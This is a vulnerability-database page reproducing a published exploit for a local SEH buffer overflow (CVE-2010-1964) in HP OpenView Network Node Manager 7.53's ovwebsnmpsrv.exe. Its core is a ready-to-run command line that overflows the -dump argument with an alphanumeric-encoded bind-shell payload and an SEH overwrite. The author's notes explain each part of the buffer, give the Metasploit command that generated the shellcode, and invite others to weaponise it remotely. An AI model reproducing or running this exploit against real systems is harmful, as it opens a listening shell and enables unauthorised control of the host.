Vulners
Lucene search
HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Local Buffer Overflow (SEH)
| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
 | HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH) | 7 Jul 201000:00 | – | zdt |
| HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil BOF | 24 Mar 201100:00 | – | zdt |
| HP OpenView Network Node Manager ovwebsnmpsrv.exe main BOF | 24 Mar 201100:00 | – | zdt |
 | CVE-2010-1964 | 17 Jun 201016:30 | – | attackerkb |
 | CVE-2010-1964 | 7 Jul 201000:00 | – | circl |
 | HP OpenView NNM ovwebsnmpsrv.exe Command Line Argument Buffer Overflow (CVE-2010-1961; CVE-2010-1964) | 16 Aug 201000:00 | – | checkpoint_advisories |
 | CVE-2010-1964 | 17 Jun 201016:00 | – | cve |
 | CVE-2010-1964 | 17 Jun 201016:00 | – | cvelist |
 | HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe ovutil' Remote Buffer Overflow (Metasploit) | 23 Mar 201100:00 | – | exploitdb |
 | HP OpenView Network Node Manager (OV NNM) 7.53 - ovwebsnmpsrv.exe Local Buffer Overflow (SEH) | 7 Jul 201000:00 | – | exploitpack |
10
# Exploit Title: HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
# Date: 07/06/2010
# Author: bitform
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows XP SP2
# CVE: CVE-2010-1964
# Exploit:
C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TU\AAAAAAAAAAAAAAAAAAAAAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPNiJEP1KbQtLKPRFPLKF2DLNkF2EDNkD2ExFoMgPJDfDqIoEaIPNLElPaQlFbDlGPJaHODMFaIWKRL0QBF7LKBrFpLKQRElFaJpNkQPD8OuIPCDCzEQHPF0LKQXGhNkBxEpEQHSKSElQYLKDtLKFaKfP1KOP1KpLlIQJoDMGqO7DxM0BUJTFcCMIhGKQmQ4CEKRBxLKBxQ4FaN3E6NkDLPKLKBxELEQJsLKC4NkC1HPMYG4GTQ4QKQKCQPYQJCaKOIpBxQOCjLKDRHkMVCmE8GCFRGpC0E8BWCCP2CoPTPhPLQgFFDGIoJuOHNpEQGpGpQ9HDPTBpBHFIMPPkGpIoKePPPPPPBpG0F0G0F0QxJJDOKoM0KOHULIO7DqIKQCE8C2GpFqQLK9HfPjDPCfCgPhIRIKEgE7KOIEBsBwBHH7KYDxKOIoJuQCCcF7PhQdJLEkKQKON5QGOyIWE8QeBNPMQqKON5BHQsBME4C0NiJCBwBwQGP1L6PjGbPYCfKRImBFO7G4FDGLC1FaNmPDGTFpKvGpG4QDPPCfQFF6CvBvBnBvF6QCQFBHQiJlEoNfKOJuK9IpBnF6CvIoP0BHDHOwGmCPKOHUMkJPH5MrF6BHMvJ5MmOmKOJuElDFCLFjOpKKM0BUEUOKG7GcQbBOCZC0CcKON5DJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC
# Notes:
This is the result of my research on CVE-2010-1964. Finding this vulnerability locally was trivial but getting
a remote exploit via jovgraph.exe never quite worked out for me. I'm hoping someone will be able to make this
a practical remote exploit. :D
Overflowing many of the other command line options will overwrite SEH as well (e.g. -demo)
Explanation of buffer:
"UXf-9Tf-9Tf-9TU"
Carve out EAX as the base register for the alphanumeric shellcode
"PYIIIIIIIIIIIIIIII7QZ"...
Alphanumeric bind shell
# ./msfpayload windows/shell_bind_tcp LPORT=4444 RHOST=127.0.0.1 R | ./msfencode BufferRegister=EAX -e x86/alpha_mixed -t raw
\/ Overwrite SEH
[ ]
"YY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMP"
[ ]
/\ Carve out non-conditional jmp to carve EAX codeData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jul 2010 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 27.5
EPSS0.79492